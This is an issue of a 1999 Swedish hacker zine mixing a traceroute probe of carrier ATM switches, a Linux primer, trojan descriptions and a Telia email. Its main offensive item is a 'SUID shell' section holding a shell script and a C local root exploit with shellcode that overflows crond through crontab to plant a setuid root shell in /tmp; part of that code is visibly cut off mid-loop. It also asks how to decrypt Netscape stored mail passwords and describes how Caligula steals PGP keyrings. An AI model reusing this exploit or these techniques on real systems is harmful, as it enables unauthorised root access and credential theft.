,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrs -./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrst ./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstu /0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuv 0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvw 123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwx 23456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxy 3456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz ------------------------------------------------------------------------ Enligt uppgifter har jag hört att chargen andvänds för att kontrollera hastigheten i en anslutning. De kan även utnyttjas för DoS attacker. Hmm, jag testar att göra en traceroute på 209.95.159.5: 1 167 ms 228 ms 174 ms md4690401.utfors.se [212.105.4.1] 2 162 ms 152 ms 157 ms br-00-00.utfors.net [195.58.102.1] 3 151 ms 154 ms 155 ms 195.58.100.50 4 * 266 ms 233 ms Hssi11-1-0.GW2.STK2.ALTER.NET [146.188.32.121] 5 249 ms * * 422.ATM6-0-0.CR1.STK2.Alter.Net [146.188.5.65] 6 347 ms 350 ms * 219.ATM5-0.BR1.NYC5.Alter.Net [146.188.7.110] 7 671 ms 733 ms 745 ms 431.ATM5-0.GW2.NYC5.ALTER.NET [137.39.30.141] 8 868 ms 920 ms * 152.ATM2-0.XR1.NYC1.ALTER.NET [146.188.177.246] 9 * * 875 ms 195.ATM6-0.XR1.NYC4.ALTER.NET [146.188.178.82] 10 714 ms * 614 ms 189.ATM3-0.GW8.NYC4.ALTER.NET [146.188.180.49] 11 268 ms 314 ms 259 ms Telia-gw.customer.ALTER.NET [157.130.5.74] 12 257 ms 258 ms 255 ms ny-b1-atm3-0-101.usa.telia.net [209.95.129.69] 13 381 ms 336 ms 330 ms sf-b1-pos0-0.telia.net [209.95.159.21] 14 460 ms 331 ms 345 ms sf-i2.telia.net [209.95.159.5] ATM är ju en växel för transmission i Nätverk, intressant. Det tyder stor på att det är en ATM växel. Om du telnettar till t.ex. 146.188.178.82 (troligtv- is en ATM växel) så får du en login prompt. ----------------------------------------------------------------------------- Skapa SUID Shell ----------------------------------------------------------------------------- #!/dev/null ## By ncode -99 ## Detta skrevs av ren tråkighet, hoppas nån lär sig. ## Detta programmet skapar ett suid shell(/tmp/XxX) åt dig. ## Men root måste köra det för annars blir det ente suid. ## Om det känns för fattigt kan du alltid köra 2.c ## Det är kodat av Dillon. <-- - - - - - - - -start of login.sh - - - - - - - - --> cp /bin/bash /XxX chmod 4755 /tmp/XxX <-- - - - - - - - -end of login.sh - - - - - - - - --> <-- - - - - - - - -start of 2.c- - - - - - - - --> /* Detta gör ungefär samma sak som login.sh */ /* Kompilera 2.c och döp om a.out till nått trevligt */ /* Därefter ska bara root köra det */ #include #include #include #include #include #define DEFAULT_OFFSET 560 #define DEFAULT_BUFFER_SIZE 980 #define TOTAL_BUFFER 4096 char shellcode[]= "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07" "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12" "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8" "\xd7\xff\xff\xff/tmp/xo"; long get_esp(void) { __asm__("movl %esp,%eax"); } void calc_bs(int *bs_ptr) { int len=0; struct passwd *p_name; /* dependant on length of username */ p_name=getpwuid(getuid()); len=strlen(p_name->pw_name); *bs_ptr = 986 - len; return; } int main(int argc, char **argv) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int i, ofs=DEFAULT_OFFSET; int bs=DEFAULT_BUFFER_SIZE; FILE *fp=NULL; /* probably will not need to give argument */ if (argc==2) ofs=atoi(argv[1]); calc_bs(&bs); buff=malloc(TOTAL_BUFFER); if(!buff) { perror("malloc"); exit(EXIT_FAILURE); } ptr=buff; memset(ptr,0x90, bs-strlen(shellcode)); ptr += bs-strlen(shellcode); for (i=0; i\n"); fprintf(fp,"#include \n"); fprintf(fp,"main() {\n"); fprintf(fp,"\tsystem(\"/bin/cp /bin/sh /tmp/XxX\");\n"); fprintf(fp,"\tsystem(\"chown root /tmp/XxX\");\n"); fprintf(fp,"\tsystem(\"chmod 4755 /tmp/XxX\");\n"); fprintf(fp,"}\n"); fclose(fp); /* compile our program to create suid shell */ system("cc -o /tmp/xo /tmp/xo.c"); unlink("/tmp/xo.c"); /* now use crontab to plant overflow for crond */ fp=fopen("r00t","w+"); if (!fp) { perror("fopen"); exit(EXIT_FAILURE); } fprintf(fp,"%s\n",buff); fclose(fp); /* put our r00t crontab in crontabs directory */ system("/usr/bin/crontab r00t"); unlink("r00t"); /* helpful reminder */ printf("Now wait about 1 minute and look\n"); printf("for the suid shell -> /tmp/XxX\n"); exit(0); } <-- - - - - - - - -end of 2.c- - - - - - - - --> ----------------------------------------------------------------------------- Enkelt om 2 olika Trojaner ----------------------------------------------------------------------------- [Förord] Jag tänke skriva enkelt om hur trojanerna Caligula och Picture.exe fungerar och vilket syfte de andvänds till. En trojan är en körbar fil som innehåller något som inte en X vet om, och som i syfte andvänds för att få full access till en dator för att t.ex. få tag i Private Nycklar, Krypterade Filer, Hemligheter och Lösenord (typ .pwl) [Caligula] Caligula är en trojan som också kan betraktas som ett virus eftersom den inte förstör något. Caligula är släppt av Codebreakers för er som inte visste. Viruset eller Trojanen är i själva värket ett Macro Virus som först tar reda på var du installerat PGP (Pretty Good Privacy) genom att öppna register nyckeln: HKEY_CLASSES_ROOT\PGP Encrypted File\shell\open\command. När den hittat var PGP är installerat letar den efter secret key ring (/PGP Keyrings/secring.skr) och när den hittat den kopierar Caligula din secret key ring och laddar upp den på Codebreakers ftp (208.201.88.110 eller ftp.codebr- eakers.org) i "incoming" katalogen. Efter ha kört Caligula skapar den en register nyckel i: HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info\Caligula och "value" till [1] Om du vill veta om du är infekterad av Caligula kan du ju enkelt ta en titt i registret, som alla vet så är Unix för säkert för att göra en trojan som stödjer Linux, jo det är självklart att det finns. Men antalet trojaner som finns för Windows 9x och Windows NT är överlägset. Trojaner för Unix andvänds också ofta i ett annat syfte än en trojan för Windows. [Picture.exe] Picture.exe är en Trojan som skickas som bifogande via email. Picture.exe kan också ses i namnet Manager.exe. Om du nu skulle öppna Picture.exe så plasera- r den en liten fil i c:\Windows som heter note.exe också en rad i win.ini (c:\Windows\win.ini) som ser ut så här: RUN=NOTE.EXE. För er som inte fattar så startar trojanen som är döpt till note.exe varje gång Windows startar, sen skapar den en fil i c:\Windows\$2321.dat, som innehåller en krypterad uppräk- ning av alla filtillägg i katalog-trädet, som startar med h, i, m, p, s eller t. Jag orkar inte förklara hur kryptering fungerar, det kan ni läsa i ISS. Den letar efter sidor som offret varit på och email addresser, både lokala och folk offret mailat. Sen testar trojanen att connecta till olika SMTP servers och bli bekräftad. Picture.exe tar alltså kortfattat reda på en massa information om din dator som kan andvändas för angrepp och dataintrång. ----------------------------------------------------------------------------- Brev angående telias rätt om språrning ----------------------------------------------------------------------------- To: xxx@xxxxxx.com From: xxx@telia.se Subject: Från Telias sida kommenterar vi inte i vilka sammanhang och hur vi går tillväga för att avslöja de personer som utnyttjar ett internetkonto obehörigt. Den enda kommentaren jag är beredd att ge dig är att alla som använt ett internetkonto finns registrerade samt att Telia har rätt att använda denna information för att vidtaga lämpliga åtgärder. Vill u diskutera detta ytterligare hänvisar jag dig till chefen för vår avdelning, Internetsäkerhetsutredningar, Lennart Andersson som träffas på tel xxx-xxxxxx -----Ursprungligt meddelande----- Från: xxx@xxxxxx.com [xxx@xxxxxx.com ] Skickat: den xx xxxx 1999 Till: xxx@telia.se Tänkte bara höra om era rättigheter för spårning fortfarande är lika meningslös? Min polare blev drabbad av dessa ligister som använder så kallade felias (vilket i min mening är helt omoraliskt) och efter 3 månaders väntan och nerskrivning av online tider så kom telia fram till att hans konto blev (ab)used men de hade inte resurserna till att spåra.. Skulle verkligen bli glad om du läste igenom bifogad fil och kommenterade korrekt respektive inkorrekt information.. Tack på förhand.. ----------------------------------------------------------------------------- Linux för dumma, del #1 ----------------------------------------------------------------------------- Eftersom jag studerar just ämnet Linux/Unix nu så tänkte jag börja på en liten serie med olika delar kring Linux/Unix, förhoppningsvis både avancerat och grundläggande. Dessa serier kommer vara skrivna helt för min egen skull. Så kom inte och klaga. [Katalogstrukteren] / - Rooten /boot - Boot /bin - Binary /dev - Devices /etc - Etc /home - Home /lost+found - Lost+found /lib - Library /mnt - Mounted /proc - Proc /root - Root /sbin - Sbin /tmp - Temporary /usr - User /var - Variable -[ / ]- Rooten innehåller inte något speciellt förutom alla andra Bibliotek. -[ /boot ]- I /boot ligger nästan allt som har med kerneln att göra. Denna heter vlinuz eller vmlinuz-(version) och på vissa system även zImage. Här ligger även kart filer som håller reda på ditt system. -[ /bin ]- bin = binary = binärt. /bin är ett bibliotek reserverat för programfiler, och inte den enda (se längre ner i artikeln) Just i detta bibliotek ligger kommando-program, så som typ ls, login, kill osv. -[ /dev ] - dev = devices. Här ligger filer som representerar gränsnitt på datorn, typ floppyn, cdromen, zipdriven, nätverks kortet osv. Om du nu t.ex. vill mounta floppyn skriver du. # mount -t msdos /dev/fd0 /mnt/floppy Biblioteket /mnt specifieras längre ner. -[ /etc ]- Innehåller alla konfigurations filer för olika program och tjänster, även startfilerna (/etc/rc.d) och krypterade lösenord (/etc/shadow) -[ /home ]- Innehåller alla hem bibliotek för olika users. -[ /lost+found ]- I detta bibliotek lägger systemet alla filer och delar av filer som den hittar när den städar hårdisken. -[ /mnt ]- Reserverat bibliotek för monterade partioner/cdrom/floppy osv, t.ex. # cd /mnt # ls hda1 hda2 floppy cdrom Iofs kan du montera t.ex. en floppy i vilket bibliotek du vill, men /mnt är reserverad för det. -[ /proc ]- Detta biblitek innehåller inte något fysiskt filsystem, utan ett virtuellt system som hålls av primärminnet. Biblioteket innehåller information om syst- emet som många binära filer andvänder sig av. Du kan själv kolla genom att ge kommandot more /proc/interrups -[ /root ]- Detta är en hem bibliotek för självaste admin (root, superuser). Admins hem bibbla ligger i ett separat bibliotek och inte i /home biblioteket. -[ /sbin ]- Innehåller installation/konfigurations verktyg som endast admin(root) kan andvända, verktyg så som fdisk, xf86config osv. -[ /tmp ]- tmp = Temporary, /tmp är ett bibliotek för temporära filer. Fungerar precis i samma syfte som c:/Windows/temp i Windoze 95. -[ /usr ]- Innehåller i stort sätt alla program på hela Native partitionen. /usr biblio- teket är uppdelat i olika delar... /usr/bin - Alla binära filer /usr/lib - Alla librarys /usr/doc - Dokumentation för alla program /usr/man - Manualer för alla program (samma som ovan) -[ /var ]- var = variable, men iafs...här ligger filer som varierar i storlek. Kan du komma på någon ? ..inte, jaja...men typ Loggfiler, låsfiler, PID-filer som innehåller information om programs processnummer. [Vad är Swap för något?] Det finns många som inte vet vad Swap är för något. Jag tänkte berätta så enkelt så möjligt vad det är och vad det andvänds till. Swap är ett Virtuellt minne som hjälper till när de fysiska minnet inte räcker till. Det första datorn gör när den arbetar är att ta till processorn, när proces- sorn inte räcker till hjälper de fysiska minnet till (det är då det börjar rassla i datorn) och när inte de fysiska minnet räcker till hjälper Swap minnet till. [Hur reagerar Linux när en andvändare inte har tillgång till ett kommando?] Det finns många olika kommandon i Linux, en del får endast andvändas av admin och en del är öppna för alla, hur reagerar Linux på detta ? praktisera... $ adduser bash: adduser: command not found Här ger bash utdata att kommandot inte finns. Men du vet ju var kommandot adduser finns, ok..vi testar att gå till biblioteket där själv kommandot är lagrat. $ cd /sbin $ adduser bash: /sbin/adduser: Permission denied Jippi!, här står i alla fall att du inte har tillgång till kommandot inte får andvändas av någon annan en admin (root). ----------------------------------------------------------------------------- Insändare ----------------------------------------------------------------------------- Denna sektion kommer i framtiden dyka upp när det kommer in frågor och åsikt- er angående Heretics Inc. och Underground. --> Netscape 4.05 (Messenger) kryptering Nu är det jag som har en fråga, eftersom det inte är någon än som har skickat in några frågor. Men jag undrar om det är nån som vet någon dokumentation eller c-script som har med algoritmen som krypterar Netscape Messenger i Netscape Communicator 4.05. Jag har märkt att om du väljer att Messenger ska komma ihåg lösenordet till din mailserver så sparas det i en fil /users/username/prefs.js. Kolla raden nedan hur du nu hittar det krypterade lösenordet. user_pref("mail.pop_password", "krypterat passwd"); user_pref("mail.remember_password", true); Första raden handhåller det krypterade lösenordet och den andra om du valt att composer ska komma ihåg ditt lösenord till ditt konto på mailservern. Första raden finns alltså inte om du inte har satt andra raden till "true" diox1de@hacksweden.com ----------------------------------------------------------------------------- Avslutning ----------------------------------------------------------------------------- Ja, nu var det slut för detta nummer, bättre information i nästa :) O U T L A W I N F O R M A T I V A issue #8 Produced and (c) Heretics Incoperated. Time/Date: 22:45 1999-10-09 "Magic is a push/pull situation, like the universe itself. While one is pushing, he cannot pull. The purpose of a ritual is to "push" the des- ired result within a unique span of time and space, then move away and "pull" by divorcing oneself from all thoughts and related acts previo- usly ritualized." Knowledge is power, with no power you never get Knowledge - Heretics Inc. -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.0.2i iQA/AwUBN5zSsnRmgGlPBhFaEQLQngCgjAdjJAjiAqYXs9YTnGFjd0/VaXYAnj+Q X3pmKDomoNWBQp8LyYIdwbqm =estT -----END PGP SIGNATURE-----